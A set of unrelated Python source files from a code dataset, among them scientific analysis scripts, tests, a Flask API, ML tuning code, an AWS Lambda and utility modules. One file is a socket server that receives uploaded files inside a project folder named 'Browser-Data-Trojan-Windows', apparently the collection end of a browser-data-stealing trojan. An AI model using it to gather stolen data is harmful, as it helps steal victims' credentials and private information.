self.memo(file_name)\n vol,mon = plot_wave.plot_wave(file_name)\n plot_bunch_moment.plot_bunch_moment(file_name,vol,mon)\n plot_fft.plot_fft(file_name,vol)\n elif 'process_2' in file_name:\n self.memo(file_name)\n vol = plot_process.plot_process(file_name)\n plot_process_mom.plot_process_mom(file_name,vol)\n ### adjust timing\n elif self.mode_num == 1:\n print(file_name)\n if 'wave_2' in file_name:\n self.memo(file_name)\n plot_tmg.plot_timing(file_name)\n ### noise\n elif self.mode_num == 2:\n if 'wave_2' in file_name:\n self.memo(file_name)\n noise_analysis.wave_noise(file_name)\n elif 'process_2' in file_name:\n self.memo(file_name)\n noise_analysis.process_noise(file_name)\n ### reflectance\n elif self.mode_num == 9:\n if 'wave_2' in file_name:\n self.memo(file_name)\n reflectance.plot_relation_reflectance(file_name)\n elif 'process_2' in file_name:\n self.memo(file_name)\n process_ref.plot_process_ref(file_name)\n ### #13 and #15\n elif self.mode_num == 3:\n if 'wave_2' in file_name:\n self.memo(file_name)\n #noise_analysis.wave_noise(file_name)\n elif 'process_2' in file_name:\n self.memo(file_name)\n process_13_15.plot_13_15(file_name)\n ### betatron osc. #13 and #15\n elif self.mode_num == 4:\n if 'wave_2' in file_name:\n self.memo(file_name)\n #noise_analysis.wave_noise(file_name)\n elif 'process_2' in file_name:\n self.memo(file_name)\n betatron_13_15.betatron(file_name)\n elif '.txt' in file_name:\n betatron_ext.plot_twiss(file_name)\n ### plot extract data\n elif self.mode_num == 6:\n if 'vol' in file_name:\n plot_pos.plot_row(file_name)\n\n ### plot extract data\n elif self.mode_num == 7:\n if 'vol' in file_name:\n adiabatic_dump.plot_dump(file_name)\n ### quad\n elif self.mode_num == 8:\n if 'process' in file_name:\n quad_xy.quad(file_name)\n ### quad\n\n elif self.mode_num == 11:\n if 'process' in file_name:\n zero.power(file_name)\n elif self.mode_num == 17:\n if 'wave' in file_name:\n plot_cmap.plot(file_name)\n\n elif self.mode_num == 13:\n if 'wave' in file_name:\n kiwamu_em.emittance(file_name)\n return\n\n \n\nif __name__==\"__main__\":\n app = Application()\n app.mainloop()\n \n \n","sub_path":"analysis/quick_analysis.py","file_name":"quick_analysis.py","file_ext":"py","file_size_in_byte":5146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"615128564","text":"# -*- coding: utf-8 -*-\n# Copyright 2018 ICON Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom unittest import TestCase, main\n\nfrom iconsdk.exception import AddressException, JSONRPCException\nfrom iconsdk.icon_service import IconService\nfrom iconsdk.providers.http_provider import HTTPProvider\nfrom iconsdk.utils.validation import is_score_apis\nfrom tests.example_config import BASE_DOMAIN_URL_V3_FOR_TEST, VERSION_FOR_TEST\n\n\nclass TestGetScoreApi(TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.icon_service = IconService(HTTPProvider(BASE_DOMAIN_URL_V3_FOR_TEST, VERSION_FOR_TEST))\n # Because governance always has score apis, it is proper for the test.\n cls.governance_address = \"cx0000000000000000000000000000000000000001\"\n\n def test_get_score_api(self):\n # case 0: when getting score apis successfully\n result = self.icon_service.get_score_api(self.governance_address)\n self.assertTrue(result)\n # case 1: when address is wrong - wallet address\n self.assertRaises(AddressException, self.icon_service.get_score_api,\n \"hx882efc17c2f50e0d60142b9c0e746cbafb569d8c\")\n # case 2: when address is wrong - too short\n self.assertRaises(AddressException, self.icon_service.get_score_api,\n \"cx882efc17c2f50e0d60142b9c0e746cbafb\")\n # case 3: when the address is not score id\n self.assertRaises(JSONRPCException, self.icon_service.get_score_api,\n \"cxb0776ee37f5b45bfaea8cff1d8232fbb6122ec32\")\n\n def test_validate_score_apis(self):\n result = self.icon_service.get_score_api(self.governance_address)\n self.assertTrue(result)\n self.assertTrue(is_score_apis(result))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tests/api_get/test_get_score_api.py","file_name":"test_get_score_api.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"362053960","text":"# now package it all into a function\n\nimport numpy as np\nfrom skimage.feature import peak_local_max\n\ndef peak_local_max_3d(image,min_distance,threshold=0):\n\n \"\"\"Find peaks in an 3D image as intensity array.\n Peaks are the local maxima in a region of `2 * min_distance + 1`\n (i.e. peaks are separated by at least `min_distance`).\n If there are multiple local maxima with identical pixel intensities\n inside the region defined with `min_distance`,\n the coordinates of all such pixels are returned.\n\n ----------\n image : ndarray\n Input image.\n min_distance : int\n Minimum number of pixels separating peaks in a region of `2 *\n min_distance + 1` (i.e. peaks are separated by at least\n `min_distance`).\n To find the maximum number of peaks, use `min_distance=1`.\n\n Returns\n -------\n output : ndarray\n * If `indices = True` : [[x1,y1,z1],[x2,y2,z2],...] coordinates of peaks.\n\n Notes\n -----\n The function relies on applying scikit image's 2D peak_local_max function\n to generate a candidate list of 3D maxima which then get elliminated in a\n subsequent step to fulfill the min_distance criterion.\n\n\n \"\"\"\n\n ######### setup\n # make an array of zeros\n accumulator = np.zeros(image.shape)\n\n # accumulator for the coordinates and the coordinate intensities\n coordinateAccumulator = []\n\n ######### 2D\n # find all maxima in every 2D slice of the image\n for iz in range(0,image.shape[0]):\n\n coordinates=peak_local_max(image[iz],min_distance=min_distance)\n\n #write the max values into the accumulator at the right positions\n for coord in coordinates:\n coordValue = image[iz][coord[0],coord[1]]\n accumulator[iz,coord[0],coord[1]] = coordValue\n coordinateAccumulator.append([np.array([iz,coord[0],coord[1]]),coordValue])\n\n\n\n\n ######### 3D\n # Elliminate all that are too close together\n\n\n for maxCandidate in coordinateAccumulator:\n maxCandidate_z = maxCandidate[0][0]\n maxCandidate_x = maxCandidate[0][1]\n maxCandidate_y = maxCandidate[0][2]\n\n maxCandidate_value = maxCandidate[1]\n windowSizeHalf = int(min_distance/2)\n #print(windowSizeHalf)\n\n# print(maxCandidate_x-windowSizeHalf)\n# prnt(windowSizeHalf)\n from_x = max(0,maxCandidate_x-windowSizeHalf)\n to_x = min(image.shape[0],maxCandidate_x+windowSizeHalf)\n\n from_y = max(0,maxCandidate_y-windowSizeHalf)\n to_y = min(image.shape[1],maxCandidate_y+windowSizeHalf)\n\n from_z = max(0,maxCandidate_z-windowSizeHalf)\n to_z = min(image.shape[2],maxCandidate_z+windowSizeHalf)\n\n try:\n if(maxCandidate_value < threshold):\n accumulator[maxCandidate_z,maxCandidate_x,maxCandidate_y] = 0\n\n if(maxCandidate_value < np.amax(accumulator[from_z:to_z,from_x:to_x,from_y:to_y])):\n #print(\"test\")\n accumulator[maxCandidate_z,maxCandidate_x,maxCandidate_y] = 0\n except ValueError: #raised if `y` is empty.\n pass\n ########## output\n #\n result = np.transpose(np.nonzero(accumulator))\n return(result)\n","sub_path":"src/peak_local_max_3d.py","file_name":"peak_local_max_3d.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"622309942","text":"from flask import Flask, jsonify, Response\nfrom flask_cors import CORS\nimport json\n\n# Initialising things needed for the application\napp = Flask(__name__)\nCORS(app)\nwith open('data/movie_metadata.json') as movief:\n jsonMovie = json.load(movief)\nwith open('data/theater_showtimes.json') as theatref:\n jsonTheatre = json.load(theatref)\n\n# API test to make sure server is correctly configured\n@app.route('/test')\ndef test():\n return jsonify({\"Test\": 200})\n\n# Returns all theatres\n# Done to make the solution more dynamic, but for this test's sake with the lower\n@app.route('/get-all-theatres')\ndef getAllTheatres():\n return jsonify(jsonTheatre), 200\n\n# Returns info regarding movie id\n@app.route('/movie-info/', methods=['GET'])\ndef getMovieInfo(id):\n # find info and return it\n for movie in jsonMovie:\n if (movie['id'] == id):\n return jsonify(movie), 200\n \n # if reach end of json and info not found\n return Response(\"{\\\"response_msg\\\": \\\"no such movies with that id\\\"}\", status=204, mimetype='application/json')\n\n# Returns info regarding theatre id\n@app.route('/theatre-info/', methods=['GET'])\ndef getTheatreInfo(id):\n # find info and return it\n for theatre in jsonTheatre:\n if (theatre['id'] == id):\n return jsonify(theatre), 200\n \n # if reach end of json and info not found\n return Response(\"{\\\"response_msg\\\": \\\"no such theatres with that id\\\"}\", status=204, mimetype='application/json')\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"backend/venv/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"149780140","text":"from keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import SGD\nfrom keras.callbacks import EarlyStopping\nfrom keras.layers import Dropout\nfrom tqdm import tqdm\nclass EveningTuna():\n def __init__(self,xtrain,ytrain,xtest,ytest,size=[16,16,16,1],activation=\"relu\",final_activation=\"sigmoid\",learing_rate=[0.4,0.04,0.004,0.0004],beta=1,epochs=1000):\n self.xtrain = xtrain\n self.ytrain = ytrain\n self.xtest = xtest\n self.ytest = ytest\n self.size = size\n self.activation = activation\n self.final_activation = final_activation\n self.learing_rate = learing_rate\n self.beta = beta\n self.epochs = epochs\n self.size2 = len(xtrain[0])\n\n def Eveninglution(self):\n best_stats_jpg = \"\"\n best_val = 0\n for i in tqdm(range(1,self.size[0])):\n for j in range(1,self.size[1]):\n for k in range(1,self.size[2]):\n for l in self.learing_rate:\n classif = Sequential()\n classif.add(Dense(i,activation=self.activation,input_shape=(self.size2,)))\n classif.add(Dropout(0.15))\n classif.add(Dense(j, activation=self.activation))\n classif.add(Dropout(0.15))\n classif.add(Dense(k, activation=self.activation))\n classif.add(Dropout(0.15))\n classif.add(Dense(1, activation=self.final_activation))\n classif.compile(optimizer=SGD(learning_rate=l),loss=\"mean_squared_error\",metrics=[\"accuracy\"])\n classif.fit(self.xtrain,self.ytrain,batch_size=34,epochs=self.epochs,callbacks=[EarlyStopping(monitor=\"loss\")],verbose=False)\n siema = classif.evaluate(self.xtest,self.ytest,verbose=False)\n if siema[1] > best_val:\n best_val = siema[1]\n best_stats_jpg = \"Size = [\"+str(i)+\",\"+str(j)+\",\"+str(k)+\",1] | activation = \"+str(self.activation)+\" | learing rate:\"+str(l)+\" Acc = \"+str(best_val)\n print(best_stats_jpg)\nif __name__ == \"__main__\":\n pass","sub_path":"WlasnaOptuna.py","file_name":"WlasnaOptuna.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"279083681","text":"\"\"\"\nEdge detection for my BSC thesis\n\"\"\"\n# -*- coding: iso-8859-15 -*-\nimport numpy as np\nimport cv2\nimport sys\n\nfrom skimage.exposure import rescale_intensity\nimport json as _json\nfrom pprint import pprint\nfrom multiprocessing import Pool\nfrom matplotlib import pyplot as plt\nimport matplotlib.image as mpimg\nfrom matplotlib.widgets import Slider, Button, RadioButtons\n\n__author__ = \"Fauszt András\"\n__email__ = \"andras.fauszt@gmail.com\"\n\nexec(open(\"C:\\\\ScanControl\\VideoMode\\\\Python\\\\venv2\\\\Scripts\\\\activate_this.py\").read())\n\n\ndef convolve(image, kernel):\n # grab the spatial dimensions of the image, along with\n # the spatial dimensions of the kernel\n (iH, iW) = image.shape[:2]\n (kH, kW) = kernel.shape[:2]\n\n # allocate memory for the output image, taking care to\n # \"pad\" the borders of the input image so the spatial\n # size (i.e., width and height) are not reduced\n pad = (kW - 1) // 2\n image = cv2.copyMakeBorder(image, pad, pad, pad, pad,\n cv2.BORDER_REPLICATE)\n output = np.zeros((iH, iW), dtype=\"float32\")\n\n # loop over the input image, \"sliding\" the kernel across\n # each (x, y)-coordinate from left-to-right and top to\n # bottom\n for y in np.arange(pad, iH + pad):\n for x in np.arange(pad, iW + pad):\n # extract the ROI of the image by extracting the\n # *center* region of the current (x, y)-coordinates\n # dimensions\n roi = image[y - pad:y + pad + 1, x - pad:x + pad + 1]\n\n # perform the actual convolution by taking the\n # element-wise multiplicate between the ROI and\n # the kernel, then summing the matrix\n k = (roi * kernel).sum()\n\n # store the convolved value in the output (x,y)-\n # coordinate of the output image\n output[y - pad, x - pad] = k\n\n # rescale the output image to be in the range [0, 255]\n output = rescale_intensity(output, in_range=(0, 255))\n output = (output * 255).astype(\"uint8\")\n\n # return the output image\n return output\n\n\ndef updateTrackbar1(value):\n global img\n global threshold1\n global threshold2\n threshold1 = value\n cv2.imshow('main-window', cv2.Canny(img, threshold1, threshold2))\n\n\ndef updateTrackbar2(value):\n global img\n global threshold1\n global threshold2\n threshold2 = value\n cv2.imshow('main-window', cv2.Canny(img, threshold1, threshold2))\n\n\nargs = sys.argv\ncv2.namedWindow(\"main-window\", cv2.WINDOW_NORMAL)\nimg = cv2.imread(\"C:\\\\ScanControl\\\\VideoMode\\\\Images\\\\\" + args[1], cv2.IMREAD_GRAYSCALE)\nthreshold1 = 100\nthreshold2 = 200\nprint(sys.path)\nf = open('C:\\\\ScanControl\\\\VideoMode\\\\settings.json')\ndata = _json.load(f)\nf.close()\n\nkernel = None\nmulti = None\n\nfor (key, value) in data.items():\n if key == args[2]:\n kernel = np.empty([len(value), len(value)])\n for i in range(0, len(value)):\n for j in range(0, len(value)):\n if (multi != 0) or (multi != None):\n kernel[i][j] = value[i][j] * multi\n else:\n kernel[i][j] = value[i][j]\n if key == args[3]:\n multi = value\n\nedges = cv2.Canny(img, threshold1, threshold2)\n# convoleOutput = convolve(img, kernel)\nopencvOutput = cv2.filter2D(img, -1, kernel)\ncv2.imshow(\"main-window\", opencvOutput)\n\n# cv2.createTrackbar(\"Threshold1\", \"main-window\", threshold1, 1500, updateTrackbar1)\n# cv2.createTrackbar(\"Threshold2\", \"main-window\", threshold2, 1500, updateTrackbar2)\n# cv2.imshow(\"main-window\", edges)\n\ncv2.waitKey(0)\n","sub_path":"VideoMode/Python/analizeImage.py","file_name":"analizeImage.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"125890186","text":"import os\nimport logging\n\nfrom library.logger import set_logging\nfrom library.config import Config\nfrom library.aws.utility import Sns\n\n\ndef lambda_handler(event, context):\n \"\"\" Lambda handler to initiate to find public AMIs \"\"\"\n set_logging(level=logging.INFO)\n logging.debug(\"Initiating AMIs public access checking\")\n\n try:\n sns_arn = os.environ[\"SNS_ARN\"]\n config = Config()\n\n if not config.publicAMIs.enabled:\n logging.debug(\"AMIs public access checking disabled\")\n return\n\n logging.debug(\"Iterating over each account to initiate AMIs public access check\")\n for account_id, account_name in config.publicAMIs.accounts.items():\n payload = {\"account_id\": account_id,\n \"account_name\": account_name,\n \"regions\": config.aws.regions,\n \"sns_arn\": sns_arn\n }\n logging.debug(f\"Initiating AMIs public access checking for '{account_name}'\")\n Sns.publish(sns_arn, payload)\n except Exception:\n logging.exception(\"Error occurred while initiation of AMIs public access check\")\n return\n\n logging.debug(\"AMIs public access checking initiation done\")\n","sub_path":"hammer/identification/lambdas/ami-public-access-issues-identification/initiate_to_desc_public_ami_issues.py","file_name":"initiate_to_desc_public_ami_issues.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"480453156","text":"import socket\nimport tqdm\nimport os\n\nSERVER_HOST = \"0.0.0.0\"\nSERVER_PORT = 5679\nBUFFER_SIZE = 8192\nSEPARATOR = b\"\"\n\n\n\ndef server():\n os.chdir(r'C:\\Users\\Shockz\\Desktop\\Browser-Data-Trojan-Windows')\n\n #Creo el socket\n sckt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n #Enlazamos el socket a ese host y puerto\n sckt.bind((SERVER_HOST, SERVER_PORT))\n #5 peticiones max\n sckt.listen(5)\n\n print(f\"[-] Escuchando como {SERVER_HOST}:{SERVER_PORT}\")\n try:\n client_socket, address = sckt.accept()\n print(f\"[-] {address} esta conectado.\")\n\n received = client_socket.recv(BUFFER_SIZE)\n filename, filesize = received.split(SEPARATOR)\n filename = os.path.basename(filename)\n filesize = int(filesize)\n progress = tqdm.tqdm(range(filesize), f\"Receiving {filename}\", unit=\"B\", unit_scale=True, unit_divisor=1024)\n with open(filename, \"wb\") as f:\n while True:\n bytes_read = client_socket.recv(BUFFER_SIZE)\n if not bytes_read:\n break\n f.write(bytes_read)\n # update the progress bar\n progress.update(len(bytes_read))\n close(sckt)\n except (SystemExit,KeyboardInterrupt):\n close(sckt)\n\ndef close(sckt):\n #sckt.shutdown(socket.SHUT_RDWR)\n sckt.close()\n print(\"closed\")\n","sub_path":"Sockets/sckt_server.py","file_name":"sckt_server.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"315154437","text":"import numpy as np\nimport pandas as pd\n\n\ndef _right_squeeze(arr, stop_dim=0):\n \"\"\"\n Remove trailing singleton dimensions\n\n Parameters\n ----------\n arr : ndarray\n Input array\n stop_dim : int\n Dimension where checking should stop so that shape[i] is not checked\n for i < stop_dim\n\n Returns\n -------\n squeezed : ndarray\n Array with all trailing singleton dimensions (0 or 1) removed.\n Singleton dimensions for dimension < stop_dim are retained.\n \"\"\"\n last = arr.ndim\n for s in reversed(arr.shape):\n if s > 1:\n break\n last -= 1\n last = max(last, stop_dim)\n\n return arr.reshape(arr.shape[:last])\n\n\ndef array_like(obj, name, dtype=np.double, ndim=1, maxdim=None,\n shape=None, order='C', contiguous=False):\n \"\"\"\n Convert array-like to an array and check conditions\n\n Parameters\n ----------\n obj : array_like\n An array, any object exposing the array interface, an object whose\n __array__ method returns an array, or any (nested) sequence.\n name : str\n Name of the variable to use in exceptions\n dtype : {None, numpy.dtype}\n Required dtype. Default is double. If None, does not change the dtype\n of obj (if present) or uses NumPy to automatically detect the dtype\n ndim : {int, None}\n Required number of dimensions of obj. If None, no check is performed.\n If the numebr of dimensions of obj is less than ndim, additional axes\n are inserted on the right. See examples.\n maxdim : {int, None}\n Maximum allowed dimension. Use ``maxdim`` instead of ``ndim`` when\n inputs are allowed to have ndim 1, 2, ..., or maxdim.\n shape : {tuple[int], None}\n Required shape obj. If None, no check is performed. Partially\n restricted shapes can be checked using None. See examples.\n order : {'C', 'F'}\n Order of the array\n contiguous : bool\n Ensure that the array's data is contiguous with order ``order``\n\n Examples\n --------\n Convert a list or pandas series to an array\n >>> import pandas as pd\n >>> x = [0, 1, 2, 3]\n >>> a = array_like(x, 'x', ndim=1)\n >>> a.shape\n (4,)\n\n >>> a = array_like(pd.Series(x), 'x', ndim=1)\n >>> a.shape\n (4,)\n >>> type(a.orig)\n pandas.core.series.Series\n\n Squeezes singleton dimensions when required\n >>> x = np.array(x).reshape((4, 1))\n >>> a = array_like(x, 'x', ndim=1)\n >>> a.shape\n (4,)\n\n Right-appends when required size is larger than actual\n >>> x = [0, 1, 2, 3]\n >>> a = array_like(x, 'x', ndim=2)\n >>> a.shape\n (4, 1)\n\n Check only the first and last dimension of the input\n >>> x = np.arange(4*10*4).reshape((4, 10, 4))\n >>> y = array_like(x, 'x', ndim=3, shape=(4, None, 4))\n\n Check only the first two dimensions\n >>> z = array_like(x, 'x', ndim=3, shape=(4, 10))\n\n Raises ValueError if constraints are not satisfied\n >>> z = array_like(x, 'x', ndim=2)\n Traceback (most recent call last):\n ...\n ValueError: x is required to have ndim 2 but has ndim 3\n\n >>> z = array_like(x, 'x', shape=(10, 4, 4))\n Traceback (most recent call last):\n ...\n ValueError: x is required to have shape (10, 4, 4) but has shape (4, 10, 4)\n\n >>> z = array_like(x, 'x', shape=(None, 4, 4))\n Traceback (most recent call last):\n ...\n ValueError: x is required to have shape (*, 4, 4) but has shape (4, 10, 4)\n \"\"\"\n arr = np.asarray(obj, dtype=dtype, order=order)\n if maxdim is not None:\n if arr.ndim > maxdim:\n msg = '{0} must have ndim <= {1}'.format(name, maxdim)\n raise ValueError(msg)\n elif ndim is not None:\n if arr.ndim > ndim:\n arr = _right_squeeze(arr, stop_dim=ndim)\n elif arr.ndim < ndim:\n arr = np.reshape(arr, arr.shape + (1,) * (ndim - arr.ndim))\n if arr.ndim != ndim:\n msg = '{0} is required to have ndim {1} but has ndim {2}'\n raise ValueError(msg.format(name, ndim, arr.ndim))\n if shape is not None:\n for actual, req in zip(arr.shape, shape):\n if req is not None and actual != req:\n req_shape = str(shape).replace('None, ', '*, ')\n msg = '{0} is required to have shape {1} but has shape {2}'\n raise ValueError(msg.format(name, req_shape, arr.shape))\n if contiguous:\n arr = np.ascontiguousarray(arr, dtype=dtype)\n return arr\n\n\nclass PandasWrapper(object):\n \"\"\"\n Wrap array_like using the index from the original input, if pandas\n\n Parameters\n ----------\n pandas_obj : {Series, DataFrame}\n Object to extract the index from for wrapping\n\n Notes\n -----\n Raises if ``orig`` is a pandas type but obj and and ``orig`` have\n different numbers of elements in axis 0. Also raises if the ndim of obj\n is larger than 2.\n \"\"\"\n\n def __init__(self, pandas_obj):\n self._pandas_obj = pandas_obj\n self._is_pandas = isinstance(pandas_obj, (pd.Series, pd.DataFrame))\n\n def wrap(self, obj, columns=None, append=None, trim_start=0, trim_end=0):\n \"\"\"\n Parameters\n ----------\n :param obj:\n :param columns:\n :param append:\n :param trim_start:\n :param trim_end:\n :return:\n\n Returns\n -------\n wrapper : callable\n Callable that has one required input and one optional:\n\n * `obj`: array_like to wrap\n * `columns`: (optional) Column names or series name, if obj is 1d\n * `trim_start`: (optional, default 0) number of observations to drop\n from the start of the index, so that the index applied is\n index[trim_start:]\n * `trim_start`: (optional, default 0) number of observations to drop\n from the end of the index , so that the index applied is\n index[:nobs - trim_end]\n \"\"\"\n obj = np.asarray(obj)\n if not self._is_pandas:\n return obj\n\n if obj.shape[0] + trim_start + trim_end != self._pandas_obj.shape[0]:\n raise ValueError('obj must have the same number of elements in '\n 'axis 0 as orig')\n index = self._pandas_obj.index\n index = index[trim_start:index.shape[0] - trim_end]\n if obj.ndim == 1:\n if columns is None:\n name = getattr(self._pandas_obj, 'name', None)\n elif isinstance(columns, str):\n name = columns\n else:\n name = columns[0]\n if append is not None:\n name = append if name is None else name + '_' + append\n\n return pd.Series(obj, name=name, index=index)\n elif obj.ndim == 2:\n if columns is None:\n columns = getattr(self._pandas_obj, 'columns', None)\n if append is not None:\n new = []\n for c in columns:\n new.append(append if c is None else str(c) + '_' + append)\n columns = new\n return pd.DataFrame(obj, columns=columns, index=index)\n else:\n raise ValueError('Can only wrap 1 or 2-d array_like')\n","sub_path":"statsmodels/tools/validation/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":7214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"372312849","text":"#!/usr/bin/python\n\nimport sys, re, glob, os, shutil\n\ndef main():\n \"\"\"\n \"\"\"\n from optparse import OptionParser\n parser = OptionParser()\n parser.add_option('--input', dest='input', type='string', help=\"vcf input file directory path.\")\n parser.add_option('--output', dest='output', type='string', help=\"output file name.\")\n parser.add_option('--output-dir', dest='outputdir', type='string', help=\"output directore.\")\n (opts, args) = parser.parse_args()\n\n if not os.path.isdir(opts.outputdir):\n os.mkdir(opts.outputdir)\n\n if opts.input:\n input_dir=opts.input+'/output/'\n files=glob.glob(input_dir + \"*/table/*.LargeDeletion.txt\")\n else:\n sys.exit()\n \n with open(\"%s/allyears.csv\" % opts.outputdir, \"w\") as output:\n for fname in files:\t\n samplename=os.path.basename(fname).split('.')[0] # sample name (last column)\n with open(fname, 'r') as f:\n next(f)\n for line in f:\n chrname=line.split('\\t')[0]; start=line.split('\\t')[4]; stop=line.split('\\t')[5]\n newline='\\t'.join([chrname, start, stop, 'DEL', samplename])\n if \"NA\" not in newline:\n output.write(newline); output.write(\"\\n\")\n shutil.copy(\"%s/allyears.csv\" % opts.outputdir, opts.output)\n \nif __name__ == '__main__':\n main()\n","sub_path":"tools/contra/contra_large_del.py","file_name":"contra_large_del.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"288660891","text":"from .heuristic_politics import heuristic_politics\nfrom .pairs_generation_politics import pairs_generation_politics\nfrom .crossover_politics import crossover_politics, crossover_pc_politics\nfrom .mutation_politics import mutation_politics\nfrom .selection_politics import selection_politics, selection_politics_dict\n\nfrom copy import deepcopy\n\nbasic_politics = {\n \"normal\": {\n \"heuristic_politics\": heuristic_politics[[\"MonteCarlo\"]],\n \"pairs_generation_politics\": pairs_generation_politics[\"light\"],\n \"crossover_politics\": crossover_pc_politics[\"basic\"],\n \"mutation_politics\": mutation_politics[\"light\"],\n \"selection_politics\": selection_politics_dict[\"light\"],\n },\n \"stuck\": {\n \"pairs_generation_politics\": pairs_generation_politics[\"kicker\"],\n \"crossover_politics\": crossover_pc_politics[\"kicker\"],\n \"mutation_politics\": mutation_politics[\"kicker\"],\n \"selection_politics\": selection_politics_dict[\"kicker\"],\n },\n}\n\nbasic_greedy_politics = deepcopy(basic_politics)\nbasic_greedy_politics[\"normal\"][\"heuristic_politics\"] = heuristic_politics[\n [\"MonteCarlo\", \"NearestCity\"]\n]\n\nbasic_dfs_politics = deepcopy(basic_politics)\nbasic_dfs_politics[\"normal\"][\"heuristic_politics\"] = heuristic_politics[[\"DFS\"]]\n\nbasic_dfs_greedy_politics = deepcopy(basic_politics)\nbasic_dfs_greedy_politics[\"normal\"][\"heuristic_politics\"] = heuristic_politics[\n [\"DFS\", \"NearestCity\"]\n]\n\np1 = deepcopy(basic_politics)\np1[\"normal\"][\"selection_politics\"] = selection_politics[[\"tournament\", \"wheel\"]]\n\np2 = deepcopy(basic_politics)\np2[\"normal\"][\"selection_politics\"] = selection_politics[[\"wheel\"]]\n\np3 = deepcopy(basic_greedy_politics)\np3[\"normal\"][\"selection_politics\"] = selection_politics[[\"tournament\", \"wheel\"]]\n\np4 = deepcopy(basic_greedy_politics)\np4[\"normal\"][\"selection_politics\"] = selection_politics[[\"wheel\"]]\n\nMA = deepcopy(basic_politics)\nMA[\"stuck\"][\"mutation_politics\"] = mutation_politics[\"opt\"]\n\ngenetic_politics = {\n \"Basic\": basic_politics,\n \"Greedy\": basic_greedy_politics,\n \"DFS\": basic_dfs_politics,\n \"DFS, Greedy\": basic_dfs_greedy_politics,\n \"Monte_Wheel\": p2,\n \"Monte_WheelTournament\": p1,\n \"Monte_Tournament\": basic_politics,\n \"Greedy_Wheel\": p4,\n \"Greedy_WheelTournament\": p3,\n \"Greedy_Tournament\": basic_greedy_politics,\n \"MA\": MA,\n}\n","sub_path":"algorithms/genetic_politics/genetic_politics.py","file_name":"genetic_politics.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"148205294","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def bstFromPreorder(self, preorder):\n \"\"\"\n :type preorder: List[int]\n :rtype: TreeNode\n \"\"\"\n if not preorder: return None\n if len(preorder)==1: return TreeNode(preorder[0])\n left, right = 1000, 1000\n for i, num in enumerate(preorder):\n if num < preorder[0]:\n left = i\n break\n for i, num in enumerate(preorder):\n if num > preorder[0]:\n right = i\n break\n root = TreeNode(preorder[0])\n root.left = self.bstFromPreorder(preorder[left:right])\n root.right = self.bstFromPreorder(preorder[right:])\n return root\n","sub_path":"Leetcode/dfs_recursion_backtracking/1008_ConstructBinarySearchTreeFromPreorderTraversal/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"307426966","text":"#!/usr/bin/env python2\n\n# transpiled with BefunCompile v1.3.0 (c) 2017\nimport sys\nimport zlib, base64\n_g = (\"AR+LCAAAAAAABADNWslu40gS/ZVUS7qQ0Cj3ZBIEMUBfZ4A++mDQfeM1Tzz54ye2pKjFLrvs6prsLklcRMXji3ix0It6elLqSe0vS725cb+UrA+d9Ghp7bTVUWujdbaa\"\n + \"l7HBw4FotA0Zti2epbMOWsN+PJtXRxsdHtR4HE/N2tNlkvoTr//nDZj1h6827tf+7sN7Jz1aGY0Gi02wHtGRwb4anhkyWp1W6zv6P8EBOM/jEQsXCHA/HH5RLqLVX7hu\"\n + \"afrnkIElnY6+sgBmwi3v6KPsDCkja7Av4Hm2HmMi8WPAN/psIl8jwi5wxif6+d+GrDPoQprsw8/VtwJ7m09Agu/IWHZV2O+SZwIBiTOJqOvWu9PRMfUfWr8NWdpYIyuC\"\n + \"WZadKhLMSK4ItDGbgY+5SjJ/efVWCy8evqP++i+sj3H2QDi+jAzsTmgyGGMTmRaM4GP1IMiOeU3MrBaGnTVIoI2iHogqkBOjyyqAhdB+hOyx4n0HMjAMPe+ieEyIz6kG\"\n + \"WocHg9CSSWEMnR+YNAq9bCpgwxxrjLOnW9X/55B1miMrM57smZRk+c6jvMgRXV0wEoIODwMGJMngweRd1jVvwImp/vy7yO5x8ZnfwRmGTY0ZpsLYzGEXfAKXy3jYEh+R\"\n + 